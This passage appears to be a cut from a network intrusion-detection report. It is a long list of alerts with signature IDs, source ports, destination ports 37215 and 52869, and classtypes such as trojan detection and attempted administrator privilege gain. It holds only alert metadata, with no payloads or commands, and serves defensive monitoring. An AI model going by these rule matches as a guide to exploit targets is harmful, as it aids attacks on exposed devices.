                      Source Port:47632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.279669
                      SID:2829579
                      Source Port:43798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.455702
                      SID:2027339
                      Source Port:45688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.875785
                      SID:2027339
                      Source Port:54080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.991428
                      SID:2027339
                      Source Port:53144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.449569
                      SID:2025132
                      Source Port:48850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.918790
                      SID:2831300
                      Source Port:58112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.579360
                      SID:2831300
                      Source Port:39336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.950737
                      SID:2027339
                      Source Port:51886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.972472
                      SID:2025132
                      Source Port:60870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.025818
                      SID:2027339
                      Source Port:44458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.383466
                      SID:2027339
                      Source Port:48316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.933370
                      SID:2829579
                      Source Port:41828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2835222
                      Source Port:43312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2829579
                      Source Port:54054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.450134
                      SID:2025132
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.762774
                      SID:2027339
                      Source Port:58250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.979245
                      SID:2025132
                      Source Port:34166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2835222
                      Source Port:37384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.994464
                      SID:2027339
                      Source Port:43924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.702732
                      SID:2831300
                      Source Port:49674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:13.086086
                      SID:2831300
                      Source Port:38684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.328384
                      SID:2027339
                      Source Port:51596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2829579
                      Source Port:42574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2831300
                      Source Port:40590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.337240
                      SID:2025132
                      Source Port:57208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.571884
                      SID:2027339
                      Source Port:47800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.698984
                      SID:2027339
                      Source Port:59242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.697003
                      SID:2025132
                      Source Port:34624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:12.267183
                      SID:2831300
                      Source Port:42036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.207149
                      SID:2025132
                      Source Port:38228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.158919
                      SID:2027339
                      Source Port:52984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2829579
                      Source Port:36886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.074222
                      SID:2027339
                      Source Port:48114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2829579
                      Source Port:56318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.659105
                      SID:2027339
                      Source Port:43892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.220064
                      SID:2027339
                      Source Port:47212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.599361
                      SID:2027339
                      Source Port:36014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.037548
                      SID:2025132
                      Source Port:52344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:03:04.216653
                      SID:2027339
                      Source Port:49818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.390301
                      SID:2025132
                      Source Port:51042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.697942
                      SID:2027339
                      Source Port:59366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2835222
                      Source Port:38206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.883774
                      SID:2027339
                      Source Port:50866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2829579
                      Source Port:41596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.203130
                      SID:2027339
                      Source Port:38468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.063335
                      SID:2025132
                      Source Port:40962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.370646
                      SID:2027339
                      Source Port:52726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.783122
                      SID:2027339
                      Source Port:38728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.569791
                      SID:2025132
                      Source Port:40128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:12.085791
                      SID:2027339
                      Source Port:37886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.258634
                      SID:2027339
                      Source Port:37000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.171604
                      SID:2027339
                      Source Port:37098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.903210
                      SID:2027339
                      Source Port:49220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966322
                      SID:2027339
                      Source Port:51252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.021606
                      SID:2027339
                      Source Port:49206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2027339
                      Source Port:33446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2829579
                      Source Port:36682
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.718858
                      SID:2027339
                      Source Port:58092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.175191
                      SID:2831300
                      Source Port:34602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.109943
                      SID:2027339
                      Source Port:55062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.224525
                      SID:2831300
                      Source Port:51680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.202570
                      SID:2831300
                      Source Port:43560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.377547
                      SID:2027339
                      Source Port:52764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2027339
                      Source Port:39120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.067320
                      SID:2027339
                      Source Port:35074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.275988
                      SID:2027339
                      Source Port:54988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.503242
                      SID:2831300
                      Source Port:43326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.067320
                      SID:2025132
                      Source Port:52012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2835222
                      Source Port:49084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.971718
                      SID:2027339
                      Source Port:54478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.221889
                      SID:2027339
                      Source Port:59484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.514942
                      SID:2025132
                      Source Port:32936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.956473
                      SID:2831300
                      Source Port:42896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.372532
                      SID:2027339
                      Source Port:33828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.398920
                      SID:2831300
                      Source Port:34292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2829579
                      Source Port:44034
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.642551
                      SID:2831300
                      Source Port:44568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.440143
                      SID:2025132
                      Source Port:54228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2829579
                      Source Port:36164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.330687
                      SID:2027339
                      Source Port:52750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.446628
                      SID:2027339
                      Source Port:59160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.979156
                      SID:2027339
                      Source Port:37118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.330552
                      SID:2027339
                      Source Port:41256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2835222
                      Source Port:60878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2835222
                      Source Port:56812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.642910
                      SID:2025132
                      Source Port:56940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.513282
                      SID:2025132
                      Source Port:45548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.994464
                      SID:2025132
                      Source Port:34850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.431519
                      SID:2027339
                      Source Port:60390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.729296
                      SID:2831300
                      Source Port:51236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2829579
                      Source Port:60490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2829579
                      Source Port:47304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.213822
                      SID:2027339
                      Source Port:39442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.670071
                      SID:2027339
                      Source Port:35132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.954311
                      SID:2831300
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2829579
                      Source Port:42824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.429797
                      SID:2025132
                      Source Port:47720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:45144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.221889
                      SID:2027339
                      Source Port:41782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.309528
                      SID:2027339
                      Source Port:60726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2829579
                      Source Port:58516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2829579
                      Source Port:58004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.231608
                      SID:2831300
                      Source Port:42252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.628180
                      SID:2025132
                      Source Port:53798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2835222
                      Source Port:46616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2831300
                      Source Port:39906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.077334
                      SID:2829579
                      Source Port:58572
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.434719
                      SID:2025132
                      Source Port:45008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.649731
                      SID:2835222
                      Source Port:49508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334933
                      SID:2829579
                      Source Port:33388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.995636
                      SID:2027339
                      Source Port:52914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.055673
                      SID:2027339
                      Source Port:34800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:52330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.161030
                      SID:2025132
                      Source Port:45950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.439689
                      SID:2027339
                      Source Port:55516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:36886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.239928
                      SID:2027339
                      Source Port:36796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.918065
                      SID:2831300
                      Source Port:37970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2831300
                      Source Port:43122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.055687
                      SID:2027339
                      Source Port:33566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2835222
                      Source Port:54698
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.279072
                      SID:2027339
                      Source Port:50020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.243014
                      SID:2027339
                      Source Port:60560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:26.420170
                      SID:2025132
                      Source Port:36260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.933452
                      SID:2831300
                      Source Port:51032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.016319
                      SID:2027339
                      Source Port:42084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221220
                      SID:2829579
                      Source Port:47068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2835222
                      Source Port:41810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.729822
                      SID:2835222
                      Source Port:37160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2829579
                      Source Port:33172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.664220
                      SID:2831300
                      Source Port:59234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:47550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.056014
                      SID:2027339
                      Source Port:56622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.185033
                      SID:2835222
                      Source Port:42824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:49886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2831300
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.202290
                      SID:2027339
                      Source Port:44848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:52836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.007334
                      SID:2831300
                      Source Port:39442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2835222
                      Source Port:41534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.909668
                      SID:2831300
                      Source Port:37138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.112515
                      SID:2027339
                      Source Port:37944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.515688
                      SID:2027339
                      Source Port:53120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469869
                      SID:2831300
                      Source Port:35636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.082385
                      SID:2835222
                      Source Port:37702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2835222
                      Source Port:60910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.674845
                      SID:2027339
                      Source Port:37122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.060731
                      SID:2835222
                      Source Port:59522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.964600
                      SID:2831300
                      Source Port:34626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.349275
                      SID:2829579
                      Source Port:44140
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.936204
                      SID:2025132
                      Source Port:50724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.987411
                      SID:2831300
                      Source Port:33048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2829579
                      Source Port:33546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2027339
                      Source Port:49718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.882590
                      SID:2025132
                      Source Port:50582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.262354
                      SID:2027339
                      Source Port:55938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.168553
                      SID:2027339
                      Source Port:49246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.692028
                      SID:2831300
                      Source Port:45838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.109957
                      SID:2025132
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2829579
                      Source Port:38260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2829579
                      Source Port:39662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053061
                      SID:2829579
                      Source Port:43202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790680
                      SID:2027339
                      Source Port:53028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.931985
                      SID:2835222
                      Source Port:35820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:33384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.036421
                      SID:2025132
                      Source Port:43156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.094539
                      SID:2831300
                      Source Port:38588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.180913
                      SID:2025132
                      Source Port:33620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221790
                      SID:2835222
                      Source Port:56808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.001138
                      SID:2027339
                      Source Port:41364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.223887
                      SID:2829579
                      Source Port:55928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2835222
                      Source Port:47636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2835222
                      Source Port:52602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.047414
                      SID:2831300
                      Source Port:43172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.781934
                      SID:2027339
                      Source Port:45326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2829579
                      Source Port:40206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.071062
                      SID:2835222
                      Source Port:55056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.949070
                      SID:2027339
                      Source Port:57400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.996043
                      SID:2025132
                      Source Port:52076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.370228
                      SID:2027339
                      Source Port:45868
                      Destination Port:52869
                      Protocol:TCP
